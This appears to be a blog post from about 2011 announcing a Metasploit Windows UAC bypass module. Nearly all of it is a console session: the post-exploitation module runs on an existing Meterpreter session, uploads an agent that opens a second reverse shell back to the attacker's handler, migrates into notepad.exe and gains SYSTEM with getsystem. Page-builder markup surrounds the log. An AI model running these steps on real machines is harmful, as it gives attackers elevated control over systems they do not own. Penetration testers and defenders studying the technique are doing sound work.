The Windows UAC bypass was committed to the Metasploit Framework today. It is a bit different from running your traditional script. Instead of interacting with meterpreter and executing the commands from the meterpreter shell, you need to use the new use post/ modules. Below is how to use it: [fusion_builder_container hundred_percent="yes" overflow="visible"][fusion_builder_row][fusion_builder_column type="1_1" background_position="left top" background_color="" border_size="" border_color="" border_style="solid" spacing="yes" background_image="" background_repeat="no-repeat" padding="" margin_top="0px" margin_bottom="0px" class="" id="" animation_type="" animation_speed="0.3" animation_direction="left" hide_on_mobile="no" center_content="no" min_height="none"][*] Started reverse handler on 0.0.0.0:443 [*] Starting the payload handler... [*] Sending stage (749056 bytes) to 172.16.32.130 [*] Meterpreter session 1 opened (172.16.32.128:443 -> 172.16.32.130:1989) at Th u Jan 06 12:40:35 -0500 2011 msf exploit(handler) > use post/windows/escalate/bypassuac msf post(bypassuac) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST no Host RPORT 4444 no Port SESSION yes The session to run this module on. msf post(bypassuac) > set SESSION 1 SESSION => 1 msf post(bypassuac) > exploit [*] Started reverse handler on 172.16.32.128:4444 [*] Starting the payload handler... [*] Uploading the bypass UAC executable to the filesystem... [*] Meterpreter stager executable 73802 bytes long being uploaded.. [*] Uploaded the agent to the filesystem.... [*] Executing the agent with endpoint 172.16.32.128:4444 with UACBypass in effect... [*] Post module execution completed msf post(bypassuac) > [*] Sending stage (749056 bytes) to 172.16.32.130 [*] Meterpreter session 2 opened (172.16.32.128:4444 -> 172.16.32.130:1993) at Thu Jan 06 12:41:13 -0500 2011 [*] Session ID 2 (172.16.32.128:4444 -> 172.16.32.130:1993) processing InitialAutoRunScript 'migrate -f' [*] Current server process: zuWlXDpYlOMM.exe (2640) [*] Spawning a notepad.exe host process... [*] Migrating into process ID 3276 [*] New server process: notepad.exe (3276) msf post(bypassuac) > sessions -i 2 [*] Starting interaction with 2... meterpreter > getsystem ...got system (via technique 1). meterpreter > sysinfo Computer: DAVE-DEV-PC OS : Windows 7 (Build 7600, ). Arch : x64 (Current Process is WOW64) Language: en_US meterpreter > [/fusion_builder_column][/fusion_builder_row][/fusion_builder_container]